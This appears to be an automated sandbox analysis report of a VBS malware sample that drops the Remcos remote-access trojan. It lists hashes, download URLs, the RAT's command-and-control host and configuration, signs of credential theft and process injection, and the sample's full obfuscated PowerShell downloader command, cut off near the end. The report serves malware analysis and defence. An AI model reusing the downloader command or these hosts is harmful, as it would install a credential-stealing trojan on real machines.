Analysis
-
max time kernel
119s -
max time network
115s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-08-2024 14:41
Static task
static1
Behavioral task
behavioral1
Sample
buttersmoothkitchenapparealssilk.vbs
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
buttersmoothkitchenapparealssilk.vbs
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
buttersmoothkitchenapparealssilk.vbs
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
buttersmoothkitchenapparealssilk.vbs
Resource
win11-20240802-en
General
-
Target
buttersmoothkitchenapparealssilk.vbs
-
Size
113KB
-
MD5
76326ac1e6d011a8ebcba393ae837027
-
SHA1
7522980c1732232015f991e0acde8317662430a2
-
SHA256
898a32ace081284c9ac01b3a33a3b000abab7f4e207a6f8e1a7ae213e1e3cdf5
-
SHA512
829a7a45944a055ca9723e835319b1c919eb895c720c38040154aaf836184aea33a849e71f1b4a7cd9f191265f4cc0809de7ddc53a5cbd3c9b8eaf989e138e99
-
SSDEEP
1536:MkLcccOgt5pzwUGw3VUJW4Wrle/PhG+/kery+bG8:Xgt5pVGw3dS7b
Malware Config
Extracted
http://servidorwindows.ddns.com.br/Files/vbs.jpeg
http://servidorwindows.ddns.com.br/Files/vbs.jpeg
Extracted
remcos
RemoteHost
serversw.duckdns.org:6875
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
nert
-
keylog_path
%Temp%
-
mouse_option
false
-
mutex
Rmc-6K7C75
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral4/memory/1708-55-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral4/memory/4392-56-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral4/memory/2468-58-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral4/memory/1708-55-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral4/memory/4392-56-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 2 3804 powershell.exe 5 3804 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 1040 powershell.exe 3804 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
RegAsm.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeRegAsm.exedescription pid Process procid_target PID 3804 set thread context of 4376 3804 powershell.exe 81 PID 4376 set thread context of 4392 4376 RegAsm.exe 83 PID 4376 set thread context of 1708 4376 RegAsm.exe 84 PID 4376 set thread context of 2468 4376 RegAsm.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RegAsm.exeRegAsm.exeRegAsm.exeRegAsm.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exeRegAsm.exepid Process 1040 powershell.exe 1040 powershell.exe 3804 powershell.exe 3804 powershell.exe 2468 RegAsm.exe 2468 RegAsm.exe 4392 RegAsm.exe 4392 RegAsm.exe 4392 RegAsm.exe 4392 RegAsm.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
RegAsm.exepid Process 4376 RegAsm.exe 4376 RegAsm.exe 4376 RegAsm.exe 4376 RegAsm.exe 4376 RegAsm.exe 4376 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid Process Token: SeDebugPrivilege 1040 powershell.exe Token: SeDebugPrivilege 3804 powershell.exe Token: SeDebugPrivilege 2468 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
RegAsm.exepid Process 4376 RegAsm.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
WScript.exepowershell.exepowershell.exeRegAsm.exedescription pid Process procid_target PID 4192 wrote to memory of 1040 4192 WScript.exe 78 PID 4192 wrote to memory of 1040 4192 WScript.exe 78 PID 1040 wrote to memory of 3804 1040 powershell.exe 80 PID 1040 wrote to memory of 3804 1040 powershell.exe 80 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 3804 wrote to memory of 4376 3804 powershell.exe 81 PID 4376 wrote to memory of 4536 4376 RegAsm.exe 82 PID 4376 wrote to memory of 4536 4376 RegAsm.exe 82 PID 4376 wrote to memory of 4536 4376 RegAsm.exe 82 PID 4376 wrote to memory of 4392 4376 RegAsm.exe 83 PID 4376 wrote to memory of 4392 4376 RegAsm.exe 83 PID 4376 wrote to memory of 4392 4376 RegAsm.exe 83 PID 4376 wrote to memory of 4392 4376 RegAsm.exe 83 PID 4376 wrote to memory of 1708 4376 RegAsm.exe 84 PID 4376 wrote to memory of 1708 4376 RegAsm.exe 84 PID 4376 wrote to memory of 1708 4376 RegAsm.exe 84 PID 4376 wrote to memory of 1708 4376 RegAsm.exe 84 PID 4376 wrote to memory of 2012 4376 RegAsm.exe 85 PID 4376 wrote to memory of 2012 4376 RegAsm.exe 85 PID 4376 wrote to memory of 2012 4376 RegAsm.exe 85 PID 4376 wrote to memory of 4072 4376 RegAsm.exe 86 PID 4376 wrote to memory of 4072 4376 RegAsm.exe 86 PID 4376 wrote to memory of 4072 4376 RegAsm.exe 86 PID 4376 wrote to memory of 2468 4376 RegAsm.exe 87 PID 4376 wrote to memory of 2468 4376 RegAsm.exe 87 PID 4376 wrote to memory of 2468 4376 RegAsm.exe 87 PID 4376 wrote to memory of 2468 4376 RegAsm.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\buttersmoothkitchenapparealssilk.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⫮ ≵ ₪ ㊎ ㆑Bs⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑bgBr⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑PQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Cc⫮ ≵ ₪ ㊎ ㆑a⫮ ≵ ₪ ㊎ ㆑B0⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑c⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑6⫮ ≵ ₪ ㊎ ㆑C8⫮ ≵ ₪ ㊎ ㆑LwBz⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑cgB2⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bv⫮ ≵ ₪ ㊎ ㆑HI⫮ ≵ ₪ ㊎ ㆑dwBp⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bv⫮ ≵ ₪ ㊎ ㆑Hc⫮ ≵ ₪ ㊎ ㆑cw⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bu⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑LgBj⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑bQ⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑GI⫮ ≵ ₪ ㊎ ㆑cg⫮ ≵ ₪ ㊎ ㆑v⫮ ≵ ₪ ㊎ ㆑EY⫮ ≵ ₪ ㊎ ㆑aQBs⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑cw⫮ ≵ ₪ ㊎ ㆑v⫮ ≵ ₪ ㊎ ㆑HY⫮ ≵ ₪ ㊎ ㆑YgBz⫮ ≵ ₪ ㊎ ㆑C4⫮ ≵ ₪ ㊎ ㆑agBw⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑Zw⫮ ≵ ₪ ㊎ ㆑n⫮ ≵ ₪ ㊎ ㆑Ds⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑Hc⫮ ≵ ₪ ㊎ ㆑ZQBi⫮ ≵ ₪ ㊎ ㆑EM⫮ ≵ ₪ ㊎ ㆑b⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑bgB0⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑PQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑E4⫮ ≵ ₪ ㊎ ㆑ZQB3⫮ ≵ ₪ ㊎ ㆑C0⫮ ≵ ₪ ㊎ ㆑TwBi⫮ ≵ ₪ ㊎ ㆑Go⫮ ≵ ₪ ㊎ ㆑ZQBj⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑BT⫮ ≵ ₪ ㊎ ㆑Hk⫮ ≵ ₪ ㊎ ㆑cwB0⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑bQ⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑E4⫮ ≵ ₪ ㊎ ㆑ZQB0⫮ ≵ ₪ ㊎ ㆑C4⫮ ≵ ₪ ㊎ ㆑VwBl⫮ ≵ ₪ ㊎ ㆑GI⫮ ≵ ₪ ㊎ ㆑QwBs⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑ZQBu⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑Ow⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑cgB5⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑ew⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bv⫮ ≵ ₪ ㊎ ㆑Hc⫮ ≵ ₪ ㊎ ㆑bgBs⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑YQBk⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑BE⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑PQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑dwBl⫮ ≵ ₪ ㊎ ㆑GI⫮ ≵ ₪ ㊎ ㆑QwBs⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑ZQBu⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑LgBE⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑dwBu⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑bwBh⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑R⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑YQ⫮ ≵ ₪ ㊎ ㆑o⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑b⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑aw⫮ ≵ ₪ ㊎ ㆑p⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑fQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑GM⫮ ≵ ₪ ㊎ ㆑YQB0⫮ ≵ ₪ ㊎ ㆑GM⫮ ≵ ₪ ㊎ ㆑a⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Hs⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑BX⫮ ≵ ₪ ㊎ ㆑HI⫮ ≵ ₪ ㊎ ㆑aQB0⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑LQBI⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑cwB0⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑JwBG⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑aQBs⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑FQ⫮ ≵ ₪ ㊎ ㆑bw⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑bwB3⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑b⫮ ≵ ₪ ㊎ ㆑Bv⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑YQB0⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑Bm⫮ ≵ ₪ ㊎ ㆑HI⫮ ≵ ₪ ㊎ ㆑bwBt⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bs⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑bgBr⫮ ≵ ₪ ㊎ ㆑Cc⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑t⫮ ≵ ₪ ㊎ ㆑EY⫮ ≵ ₪ ㊎ ㆑bwBy⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑ZwBy⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑dQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑QwBv⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑bwBy⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑UgBl⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑Ow⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑e⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑B9⫮ ≵ ₪ ㊎ ㆑Ds⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑GY⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑o⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bv⫮ ≵ ₪ ㊎ ㆑Hc⫮ ≵ ₪ ㊎ ㆑bgBs⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑YQBk⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑BE⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑LQBu⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑dQBs⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑KQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Hs⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑bQBh⫮ ≵ ₪ ㊎ ㆑Gc⫮ ≵ ₪ ㊎ ㆑ZQBU⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑e⫮ ≵ ₪ ㊎ ㆑B0⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑PQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Fs⫮ ≵ ₪ ㊎ ㆑UwB5⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑G0⫮ ≵ ₪ ㊎ ㆑LgBU⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑e⫮ ≵ ₪ ㊎ ㆑B0⫮ ≵ ₪ ㊎ ㆑C4⫮ ≵ ₪ ㊎ ㆑RQBu⫮ ≵ ₪ ㊎ ㆑GM⫮ ≵ ₪ ㊎ ㆑bwBk⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑bgBn⫮ ≵ ₪ ㊎ ㆑F0⫮ ≵ ₪ ㊎ ㆑Og⫮ ≵ ₪ ㊎ ㆑6⫮ ≵ ₪ ㊎ ㆑FU⫮ ≵ ₪ ㊎ ㆑V⫮ ≵ ₪ ㊎ ㆑BG⫮ ≵ ₪ ㊎ ㆑Dg⫮ ≵ ₪ ㊎ ㆑LgBH⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑BT⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑cgBp⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Zw⫮ ≵ ₪ ㊎ ㆑o⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bv⫮ ≵ ₪ ㊎ ㆑Hc⫮ ≵ ₪ ㊎ ㆑bgBs⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑YQBk⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑BE⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑Ck⫮ ≵ ₪ ㊎ ㆑Ow⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑cwB0⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑cgB0⫮ ≵ ₪ ㊎ ㆑EY⫮ ≵ ₪ ㊎ ㆑b⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑Gc⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑9⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑Jw⫮ ≵ ₪ ㊎ ㆑8⫮ ≵ ₪ ㊎ ㆑Dw⫮ ≵ ₪ ㊎ ㆑QgBB⫮ ≵ ₪ ㊎ ㆑FM⫮ ≵ ₪ ㊎ ㆑RQ⫮ ≵ ₪ ㊎ ㆑2⫮ ≵ ₪ ㊎ ㆑DQ⫮ ≵ ₪ ㊎ ㆑XwBT⫮ ≵ ₪ ㊎ ㆑FQ⫮ ≵ ₪ ㊎ ㆑QQBS⫮ ≵ ₪ ㊎ ㆑FQ⫮ ≵ ₪ ㊎ ㆑Pg⫮ ≵ ₪ ㊎ ㆑+⫮ ≵ ₪ ㊎ ㆑Cc⫮ ≵ ₪ ㊎ ㆑Ow⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑ZQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑RgBs⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑Zw⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑D0⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑n⫮ ≵ ₪ ㊎ ㆑Dw⫮ ≵ ₪ ㊎ ㆑P⫮ ≵ ₪ ㊎ ㆑BC⫮ ≵ ₪ ㊎ ㆑EE⫮ ≵ ₪ ㊎ ㆑UwBF⫮ ≵ ₪ ㊎ ㆑DY⫮ ≵ ₪ ㊎ ㆑N⫮ ≵ ₪ ㊎ ㆑Bf⫮ ≵ ₪ ㊎ ㆑EU⫮ ≵ ₪ ㊎ ㆑TgBE⫮ ≵ ₪ ㊎ ㆑D4⫮ ≵ ₪ ㊎ ㆑Pg⫮ ≵ ₪ ㊎ ㆑n⫮ ≵ ₪ ㊎ ㆑Ds⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑HI⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑BJ⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑Hg⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑9⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑G0⫮ ≵ ₪ ㊎ ㆑YQBn⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑V⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑Hg⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑Ek⫮ ≵ ₪ ㊎ ㆑bgBk⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑e⫮ ≵ ₪ ㊎ ㆑BP⫮ ≵ ₪ ㊎ ㆑GY⫮ ≵ ₪ ㊎ ㆑K⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑HI⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑BG⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑YQBn⫮ ≵ ₪ ㊎ ㆑Ck⫮ ≵ ₪ ㊎ ㆑Ow⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑ZQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑SQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQB4⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑PQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑aQBt⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑ZwBl⫮ ≵ ₪ ㊎ ㆑FQ⫮ ≵ ₪ ㊎ ㆑ZQB4⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑LgBJ⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑Hg⫮ ≵ ₪ ㊎ ㆑TwBm⫮ ≵ ₪ ㊎ ㆑Cg⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑BG⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑YQBn⫮ ≵ ₪ ㊎ ㆑Ck⫮ ≵ ₪ ㊎ ㆑Ow⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑Zg⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Cg⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bz⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑YQBy⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑SQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQB4⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ 